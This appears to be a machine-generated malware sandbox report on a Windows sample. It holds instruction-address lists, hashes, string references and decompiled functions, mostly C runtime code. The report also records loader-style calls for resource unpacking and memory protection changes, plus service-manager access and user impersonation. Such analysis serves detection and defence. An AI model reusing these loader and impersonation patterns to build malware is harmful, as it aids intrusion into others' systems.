0x0040223b
0x0040223d
0x00402243
0x0040224d
0x0040224f
0x00402251
0x00402260
0x00402264
0x00402269
0x00402277
0x0040227b
0x00402286
0x00402293
0x004022af
0x004022b1
0x004022b5
0x004022b7
0x004022be
0x004022be
0x004022d7
0x004022e8
0x004022ef
0x004022f6
0x00402300
0x00402304
0x00402308
0x00402315
0x0040231a
0x0040231e
0x00402324
0x00402328
0x0040232a
0x00402331
0x00402331
0x0040234e
0x00402350
0x00402352
0x00402355
0x00402355
0x0040235b
0x0040235f
0x00402361
0x00402368
0x00402368
0x0040236d
0x00402371
0x00402373
0x00402375
0x0040237b
0x0040237b
0x00402377
0x00402377
0x00402377
0x00402390
0x00402396
0x0040239c
0x004023a0
0x004023a2
0x004023a9
0x004023a9
0x004023ae
0x004023b2
0x004023b4
0x004023ba
0x004023ba
0x004023b6
0x004023b6
0x004023b6
0x004023ce
0x004023d1
0x004023d3
0x004023dd
0x004023ec
0x004023ef
0x004023fe
0x00402401
0x00402403
0x00402411
0x00402417
0x00402424
0x00402426
0x0040242a
0x0040242c
0x00402434
0x00402434
0x0040243a
0x0040243f
0x00402443
0x00402445
0x0040244d
0x0040244d
0x00402445
0x00402251
0x0040223d
0x0040244f
0x0040245d
0x0040245f
0x00402461
0x00402462
0x00402467
0x00402467
0x0040245f
0x004021ca
0x0040246a
0x0040246e
0x00402470
0x00402478
0x00402478
0x0040247a
0x0040247e
0x00402480
0x00402488
0x00402488
0x00402480
0x00000000
0x00401c55
0x00401c62
0x00401c67
0x00401c6a
0x00401c6c
0x00401c73
0x00401c73
0x00401c77
0x00000000
0x00000000
0x00401c7b
0x00401c8f
0x00401c8f
0x00401c7d
0x00401c7d
0x00401c83
0x00000000
0x00401c85
0x00401c85
0x00401c88
0x00401c8d
0x00000000
0x00000000
0x00000000
0x00000000
0x00401c8d
0x00401c83
0x00401c98
0x00401c9a
0x00401cbd
0x00401cc2
0x00401cc5
0x00401cc7
0x00401cd0
0x00401cd0
0x00401cd2
0x00401cd4
0x00000000
0x00000000
0x00401cd6
0x00401cd8
0x00401cec
0x00401cec
0x00401cda
0x00401cda
0x00401cdd
0x00401ce0
0x00000000
0x00401ce2
0x00401ce2
0x00401ce5
0x00401ce8
0x00401cea
0x00000000
0x00000000
0x00000000
0x00000000
0x00401cea
0x00401ce0
0x00401cf5
0x00401cf5
0x00401cf7
0x00000000
0x00401cf9
0x00401d02
0x00401d07
0x00401d09
0x00401d10
0x00401d1d
0x00401d22
0x00401d25
0x00401d27
0x00401d30
0x00401d30
0x00401d32
0x00401d34
0x00000000
0x00000000
0x00401d36
0x00401d38
0x00401d4c
0x00401d4c
0x00401d3a
0x00401d3a
0x00401d3d
0x00401d40
0x00000000
0x00401d42
0x00401d42
0x00401d45
0x00401d48
0x00401d4a
0x00000000
0x00000000
0x00000000
0x00000000
0x00401d4a
0x00401d40
0x00401d55
0x00401d55
0x00401d57
0x00000000
0x00401d5d
0x00401d6a
0x00401d6f
0x00401d72
0x00401d74
0x00401d80
0x00401d80
0x00401d82
0x00401d84
0x00000000
0x00000000
0x00401d86
0x00401d88
0x00401d9c
0x00401d9c
0x00401d8a
0x00401d8a
0x00401d8d
0x00401d90
0x00000000
0x00401d92
0x00401d92
0x00401d95
0x00401d98
0x00401d9a
0x00000000
0x00000000
0x00000000
0x00000000
0x00401d9a
0x00401d90
0x00401da5
0x00401da5
0x00401da7
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00401da7
0x00401da0
0x00401da2
0x00000000
0x00401da2
0x00000000
0x00401d57
0x00401d50
0x00401d52
0x00000000
0x00401dad
0x00401db6
0x00401dbb
0x00401dbb
0x00401d10
0x00000000
0x00401d09
0x00000000
0x00401cf7
0x00401cf0
0x00401cf2
0x00000000
0x00401c9c
0x00401c9c
0x00401c9d
0x00401caf
0x00401caf
0x00000000
0x00401c9a
0x00401c93
0x00401c95
0x00000000
0x00401c95
0x00401c4f
0x00000000

APIs

OleInitialize.OLE32(00000000), ref: 004019FD
_getenv.LIBCMT ref: 00401ABA
GetCurrentProcessId.KERNEL32 ref: 00401ACD
CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
Module32First.KERNEL32 ref: 00401C48
CloseHandle.KERNEL32(00000000,?,?,00000000,?), ref: 00401C9D
Module32Next.KERNEL32 ref: 00401D02
Module32Next.KERNEL32 ref: 00401DB6
FindCloseChangeNotification.KERNELBASE(00000000), ref: 00401DC4
GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
FindResourceA.KERNEL32(00000000,00000000,00000000), ref: 00401E90
LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
LockResource.KERNEL32(00000000), ref: 00401EA7
SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
_malloc.LIBCMT ref: 00401EBA
_memset.LIBCMT ref: 00401EDD
SizeofResource.KERNEL32(00000000,?), ref: 00401F02

Strings

5, xrefs: 00402109
*, xrefs: 004020E1
x, xrefs: 00401B78
o, xrefs: 00402159
', xrefs: 00401AF6
*, xrefs: 00401A1F
[, xrefs: 00401B37
W, xrefs: 004020E6
D, xrefs: 00401DFB
4, xrefs: 00402136
W, xrefs: 00401B23
V, xrefs: 00401E19
{, xrefs: 00401E3C
!, xrefs: 004020CF
0, xrefs: 00401BBD
4, xrefs: 00402074
o, xrefs: 00402097
', xrefs: 00402006
x, xrefs: 00402088
), xrefs: 0040202E
:, xrefs: 00401B28
W, xrefs: 00401B14
8, xrefs: 00401BA9
., xrefs: 00401B0A
{, xrefs: 0040211D
x, xrefs: 00401E69
%, xrefs: 004020FA
., xrefs: 0040201F
", xrefs: 00401B0F
U, xrefs: 004020F5
___, xrefs: 0040227D
v, xrefs: 00401E4B
{, xrefs: 0040205B
{, xrefs: 00401B4B
v, xrefs: 0040206A
6, xrefs: 004020C5
[, xrefs: 00402047
_._, xrefs: 00402257
x, xrefs: 0040214A
v, xrefs: 00401B5A
!, xrefs: 00401B1E
E, xrefs: 00401E0F
o, xrefs: 00401B8D
W, xrefs: 00402033
V, xrefs: 00402038
!, xrefs: 0040201A
h, xrefs: 00401A6F
v, xrefs: 0040212C
4, xrefs: 00401B64

Memory Dump Source

Source File: 00000002.00000002.337856885.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.337856885.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.337856885.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aKuf.jbxd

Yara matches

Similarity

API ID: Resource$Module32$CloseFindHandleNextSizeof$ChangeCreateCurrentFirstInitializeLoadLockModuleNotificationProcessSnapshotToolhelp32_getenv_malloc_memset
String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
API String ID: 2366190142-2962942730
Opcode ID: 9b8e818dc389e7faa11c559f92d128544e607fef32914ff1a283466d1b654c82
Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
Opcode Fuzzy Hash: 9b8e818dc389e7faa11c559f92d128544e607fef32914ff1a283466d1b654c82
Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B

Uniqueness

Uniqueness Score: -1.00%

Function 0058092B Relevance: 3.8, Strings: 3, Instructions: 90
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

., xrefs: 0058095F
l, xrefs: 00580966
GetProcAddress., xrefs: 005809DC, 005809DF, 005809E4

Memory Dump Source

Source File: 00000002.00000002.337934822.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Offset: 00580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_580000_aKuf.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: 5b9a2ddf5e7c6b7f7fb9c4a3fd8695f4a092b3bae741f3c54382556e22440a3b
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: 4E318AB6900609CFDB10DF99C880AAEBBF9FF48324F25504AD841B7351D771EA49CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0058003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0058024D

Strings

cess, xrefs: 0058018D
kernel32.dll, xrefs: 0058008F, 00580095

Memory Dump Source

Source File: 00000002.00000002.337934822.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Offset: 00580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_580000_aKuf.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 65980d1a6785b953082f1e8a8016d24d9e37f3352a0af8a557902798a7927f25
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 73526B74A01229DFDBA4DF58C985BA8BBB1BF09304F1480D9E94DA7351DB30AE89DF14

Uniqueness

Uniqueness Score: -1.00%

Function 004018F0 Relevance: 6.3, APIs: 5, Instructions: 77
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E004018F0(void* __eax, char** __ecx, void* __edx, char* _a4, int _a8) {
				void* __ebx;
				void* __ebp;
				signed int _t12;
				void* _t21;
				int _t25;
				void* _t30;
				int _t32;
				char* _t35;

				_t21 = __edx;
				_t35 = _a4;
				_t17 = __ecx;
				if(_t35 != 0) {
					_t25 = lstrlenA(_t35) + 1;
					E004017E0(_t17, _t21, _t35, _t17, _t25,  &(_t17[1]), 0x80);
					_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t25); // executed
					asm("sbb esi, esi");
					_t30 =  ~_t12 + 1;
					if(_t30 != 0) {
						_t12 = GetLastError();
						if(_t12 == 0x7a) {
							_t32 = MultiByteToWideChar(_a8, 0, _t35, _t25, 0, 0);
							E004017E0(_t17, _a8, _t35, _t17, _t32,  &(_t17[1]), 0x80);
							_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t32);
							asm("sbb esi, esi");
							_t30 =  ~_t12 + 1;
						}
						if(_t30 != 0) {
							_t12 = E00401030();
						}
					}
					return _t12;
				} else {
					 *__ecx = _t35;
					return __eax;
				}
			}

0x004018f0
0x004018f2
0x004018f6
0x004018fa
0x00401917
0x0040191a
0x0040192f
0x00401939
0x0040193b
0x0040193e
0x00401940
0x00401949
0x0040195e
0x0040196b
0x00401980
0x0040198a
0x0040198c
0x0040198c
0x0040198f
0x00401991
0x00401991
0x0040198f
0x0040199a
0x004018fc
0x004018fc
0x00401900
0x00401900

APIs

lstrlenA.KERNEL32(?), ref: 00401906
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
GetLastError.KERNEL32 ref: 00401940
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980

Memory Dump Source

Source File: 00000002.00000002.337856885.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.337856885.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.337856885.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aKuf.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLastlstrlen
String ID:
API String ID: 3322701435-0
Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8

Uniqueness

Uniqueness Score: -1.00%

Function 0040AF66 Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 63%

			E0040AF66(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4) {
				signed int _v4;
				signed int _v16;
				signed int _v40;
				void* _t14;
				signed int _t15;
				intOrPtr* _t21;
				signed int _t24;
				void* _t28;
				void* _t39;
				void* _t40;
				signed int _t42;
				void* _t45;
				void* _t47;
				void* _t51;

				_t40 = __edi;
				_t28 = __ebx;
				_t45 = _t51;
				while(1) {
					_t14 = E0040B84D(_t28, _t39, _t40, _a4); // executed
					if(_t14 != 0) {
						break;
					}
					_t15 = E0040D2E3(_a4);
					__eflags = _t15;
					if(_t15 == 0) {
						__eflags =  *0x423490 & 0x00000001;
						if(( *0x423490 & 0x00000001) == 0) {
							 *0x423490 =  *0x423490 | 0x00000001;
							__eflags =  *0x423490;
							E0040AEFC(0x423484);
							E0040D2BD( *0x423490, 0x41a704);
						}
						E0040AF49( &_v16, 0x423484);
						E0040CD39( &_v16, 0x420fa4);
						asm("int3");
						_t47 = _t45;
						_push(_t47);
						_push(0xc);
						_push(0x420ff8);
						_t19 = E0040E1D8(_t28, _t40, 0x423484);
						_t42 = _v4;
						__eflags = _t42;
						if(_t42 != 0) {
							__eflags =  *0x4250b0 - 3;
							if( *0x4250b0 != 3) {
								_push(_t42);
								goto L16;
							} else {
								E0040D6E0(_t28, 4);
								_v16 = _v16 & 0x00000000;
								_t24 = E0040D713(_t42);
								_v40 = _t24;
								__eflags = _t24;
								if(_t24 != 0) {
									_push(_t42);
									_push(_t24);
									E0040D743();
								}
								_v16 = 0xfffffffe;
								_t19 = E0040B70B();
								__eflags = _v40;
								if(_v40 == 0) {
									_push(_v4);
									L16:
									__eflags = HeapFree( *0x4234b4, 0, ??);
									if(__eflags == 0) {
										_t21 = E0040BFC1(__eflags);
										 *_t21 = E0040BF7F(GetLastError());
									}
								}
							}
						}
						return E0040E21D(_t19);
					} else {
						continue;
					}
					L19:
				}
				return _t14;
				goto L19;
			}

0x0040af66
0x0040af66
0x0040af69
0x0040af7d
0x0040af80
0x0040af88
0x00000000
0x00000000
0x0040af73
0x0040af79
0x0040af7b
0x0040af8c
0x0040af98
0x0040af9a
0x0040af9a
0x0040afa3
0x0040afad
0x0040afb2
0x0040afb7
0x0040afc5
0x0040afca
0x0040afd0
0x0040aec2
0x0040b6b5
0x0040b6b7
0x0040b6bc
0x0040b6c1
0x0040b6c4
0x0040b6c6
0x0040b6c8
0x0040b6cf
0x0040b714
0x00000000
0x0040b6d1
0x0040b6d3
0x0040b6d9
0x0040b6de
0x0040b6e4
0x0040b6e7
0x0040b6e9
0x0040b6eb
0x0040b6ec
0x0040b6ed
0x0040b6f3
0x0040b6f4
0x0040b6fb
0x0040b700
0x0040b704
0x0040b706
0x0040b715
0x0040b723
0x0040b725
0x0040b727
0x0040b73a
0x0040b73c
0x0040b725
0x0040b704
0x0040b6cf
0x0040b742
0x00000000
0x00000000
0x00000000
0x00000000
0x0040af7b
0x0040af8b
0x00000000

APIs

_malloc.LIBCMT ref: 0040AF80

Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4

std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3

Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08

std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
__CxxThrowException@8.LIBCMT ref: 0040AFC5

Memory Dump Source

Source File: 00000002.00000002.337856885.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.337856885.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.337856885.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aKuf.jbxd

Yara matches

Similarity

API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
String ID:
API String ID: 1411284514-0
Opcode ID: a95b220d2d9c14b1a5c56d8a9dfd7e07f088015f43c1402ade5625b42879af68
Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
Opcode Fuzzy Hash: a95b220d2d9c14b1a5c56d8a9dfd7e07f088015f43c1402ade5625b42879af68
Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E

Uniqueness

Uniqueness Score: -1.00%

Function 00580E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,00580223,?,?), ref: 00580E19
SetErrorMode.KERNELBASE(00000000,?,?,00580223,?,?), ref: 00580E1E

Memory Dump Source

Source File: 00000002.00000002.337934822.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Offset: 00580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_580000_aKuf.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 98f90b11f9820096b8e3bc537218192125a566a5c7f8a1e0e22553c4d528148f
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: F7D0123114512877D7403A94DC09BCE7F1CDF05B62F008411FB0DE9080C770994047E5

Uniqueness

Uniqueness Score: -1.00%

Function 0040E7EE Relevance: 3.0, APIs: 2, Instructions: 8
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040E7EE(int _a4) {

				E0040E7C3(_a4); // executed
				ExitProcess(_a4);
			}

0x0040e7f6
0x0040e7ff

APIs

___crtCorExitProcess.LIBCMT ref: 0040E7F6

Part of subcall function 0040E7C3: GetModuleHandleW.KERNEL32(mscoree.dll,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7CD
Part of subcall function 0040E7C3: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040E7DD
Part of subcall function 0040E7C3: CorExitProcess.MSCOREE(00000001,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7EA

ExitProcess.KERNEL32 ref: 0040E7FF

Memory Dump Source

Source File: 00000002.00000002.337856885.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.337856885.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.337856885.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aKuf.jbxd

Yara matches

Similarity

API ID: ExitProcess$AddressHandleModuleProc___crt
String ID:
API String ID: 2427264223-0
Opcode ID: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
Instruction ID: d9ec683f250bcd397ae0bae66fbc2b9097e114182cfe22e5ca4178904d999afd
Opcode Fuzzy Hash: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
Instruction Fuzzy Hash: ADB09B31000108BFDB112F13DC09C493F59DB40750711C435F41805071DF719D5195D5

Uniqueness

Uniqueness Score: -1.00%

Function 021399E8 Relevance: 1.6, APIs: 1, Instructions: 92
serviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenServiceA.ADVAPI32(?,?,?), ref: 02139AC2

Memory Dump Source

Source File: 00000002.00000002.338286727.0000000002130000.00000040.00000800.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2130000_aKuf.jbxd

Similarity

API ID: OpenService
String ID:
API String ID: 3098006287-0
Opcode ID: 3676f4d0e2cad17f4410103c35f5a3f45864de649ea21fb3131aaf05cd9eb420
Instruction ID: c7b154dc617fa1ae8f854f234c07da54891aa97932aed2727dea1e46cba44ed9
Opcode Fuzzy Hash: 3676f4d0e2cad17f4410103c35f5a3f45864de649ea21fb3131aaf05cd9eb420
Instruction Fuzzy Hash: 3B3154B0D402488FDB11CFA9C885BDEBBF2BB48714F148229E816AB340D7B49841CF91

Uniqueness

Uniqueness Score: -1.00%

Function 02139920 Relevance: 1.6, APIs: 1, Instructions: 59
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 021399A5

Memory Dump Source

Source File: 00000002.00000002.338286727.0000000002130000.00000040.00000800.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2130000_aKuf.jbxd

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: fab52e0e0703f754de496b47deeeedb5ef9824bfafedc2e44c447ac46c41a27c
Instruction ID: 348dfc4da01eeb47f11d111c1f91a8826e07b689df992d393cffae0047756af3
Opcode Fuzzy Hash: fab52e0e0703f754de496b47deeeedb5ef9824bfafedc2e44c447ac46c41a27c
Instruction Fuzzy Hash: 252113B6C002199FCB10CF9AD984BDEFBF5FB88714F14816AD809BB244D774A940CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02139180 Relevance: 1.6, APIs: 1, Instructions: 56
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 021391F4

Memory Dump Source

Source File: 00000002.00000002.338286727.0000000002130000.00000040.00000800.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2130000_aKuf.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 05d22f211e17c132285611ec74bd51778ec8c846c0eecb256e58488ee6c016c0
Instruction ID: 6143529215169c384eb65fb6313b5664aa9ee72517e3deff81e82a9efcff75da
Opcode Fuzzy Hash: 05d22f211e17c132285611ec74bd51778ec8c846c0eecb256e58488ee6c016c0
Instruction Fuzzy Hash: C311E0B1D002499FDB10DFAAC984AEFFBF5FF48320F50842AD41AA7240C775A944CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02139350 Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindCloseChangeNotification.KERNELBASE ref: 021393B2

Memory Dump Source

Source File: 00000002.00000002.338286727.0000000002130000.00000040.00000800.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2130000_aKuf.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 2091c0a427def9c26bd29f9f327483ee96c93bf4841c6c8530c147c0a28e7bc0
Instruction ID: 6bd0cc0dc94f5afa49fa5313bff8a49a6be78138365f20cb79407ca0616d0098
Opcode Fuzzy Hash: 2091c0a427def9c26bd29f9f327483ee96c93bf4841c6c8530c147c0a28e7bc0
Instruction Fuzzy Hash: E511F5B1D003498FDB10DFAAC9447EFBBF5EB88714F14842AD419A7240C775A944CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02139ED8 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ImpersonateLoggedOnUser.KERNELBASE ref: 02139F37

Memory Dump Source

Source File: 00000002.00000002.338286727.0000000002130000.00000040.00000800.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2130000_aKuf.jbxd

Similarity

API ID: ImpersonateLoggedUser
String ID:
API String ID: 2216092060-0
Opcode ID: e5d223c3fd9106c5c3be128dadea757fd372145b1c4a16449b9f6d55f3edc00f
Instruction ID: 44cdc5f4676acf2c04af7f5cd052a03b1562fd468f75734ab739565911fd0f39
Opcode Fuzzy Hash: e5d223c3fd9106c5c3be128dadea757fd372145b1c4a16449b9f6d55f3edc00f
Instruction Fuzzy Hash: F81103B1900249CFDB10CF9AD984BDEBBF8EF48324F10846AD459B7640D378A985CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 02139CC8 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindCloseChangeNotification.KERNELBASE ref: 02139D27

Memory Dump Source

Source File: 00000002.00000002.338286727.0000000002130000.00000040.00000800.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2130000_aKuf.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 769f4b919bb7f19e3e34029cd72aab79f480cabbcff567334369371f6a1bd72e
Instruction ID: 55ba48ecd4ae361a27dddea0c451a815358c6726f5f02198f93d6af126a2a749
Opcode Fuzzy Hash: 769f4b919bb7f19e3e34029cd72aab79f480cabbcff567334369371f6a1bd72e
Instruction Fuzzy Hash: EB1115B19002498FDB10CF9AD985BDEFBF4EF48324F10846AD459B7640D379A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040D534 Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040D534(intOrPtr _a4) {
				void* _t6;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x4234b4 = _t6;
				if(_t6 != 0) {
					 *0x4250b0 = 1;
					return 1;
				} else {
					return _t6;
				}
			}

0x0040d549
0x0040d54f
0x0040d556
0x0040d55d
0x0040d563
0x0040d559
0x0040d559
0x0040d559

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040D549

Memory Dump Source

Source File: 00000002.00000002.337856885.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.337856885.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.337856885.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aKuf.jbxd

Yara matches

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548

Uniqueness

Uniqueness Score: -1.00%

Function 0040EA0A Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 25%

			E0040EA0A(intOrPtr _a4) {
				void* __ebp;
				void* _t2;
				void* _t3;
				void* _t4;
				void* _t5;
				void* _t8;

				_push(0);
				_push(0);
				_push(_a4);
				_t2 = E0040E8DE(_t3, _t4, _t5, _t8); // executed
				return _t2;
			}

0x0040ea0f
0x0040ea11
0x0040ea13
0x0040ea16
0x0040ea1f

APIs

_doexit.LIBCMT ref: 0040EA16

Part of subcall function 0040E8DE: __lock.LIBCMT ref: 0040E8EC
Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E923
Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E938
Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E962
Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E978
Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E985
Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9B4
Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9C4

Memory Dump Source

Source File: 00000002.00000002.337856885.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.337856885.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.337856885.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aKuf.jbxd

